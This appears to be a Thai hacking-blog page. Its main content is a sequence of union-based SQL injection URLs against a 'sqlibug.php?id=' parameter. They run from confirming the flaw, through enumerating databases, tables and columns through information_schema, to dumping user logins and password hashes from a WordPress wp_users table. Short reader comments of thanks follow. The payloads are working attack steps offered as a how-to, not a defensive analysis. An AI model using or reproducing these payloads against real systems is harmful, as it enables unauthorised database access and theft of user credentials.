http://localhost/sqlibug.php?id=1 => Victim http://localhost/sqlibug.php?id=1' => Bug http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+1,2,3-- => Magic Number 1,2,3 http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+database(),2,3-- => Current DataBase http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(schema_name),2,3+from+information_schema.schemata-- => Group DataBases http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(table_name),2,3+from+information_schema.tables+where+table_schema=database()-- => Table In Current DataBase http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(table_name),2,3+from+information_schema.tables+where+table_schema=0x776f72647072657373-- => Tables In Any DataBase http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(column_name),2,3+from+information_schema.columns+where+table_name=0x77705f7573657273+and+table_schema=0x776f72647072657373-- => Columns In Table In DataBase http://localhost/sqlibug.php?id=1+and+1=2+union+all+select+group_concat(id,0x3a,user_login,0x3a,user_pass),2,3+from+wordpress.wp_users-- => Dump Data In Columns
หน้าเว็บ
▼
ขอบคุณมากพี่
ตอบลบมีประโยชน์มากๆ
ความคิดเห็นนี้ถูกผู้เขียนลบ
ตอบลบขอบคุณพี่หนุ่มมากนะคับ ผมจับไปแปลไทย ใส่เครดิตไว้ให้แล้วนะครับ
ลบฝากด้วยเน้อ
http://basic-hack.blogspot.com/2012/05/sql-injection.html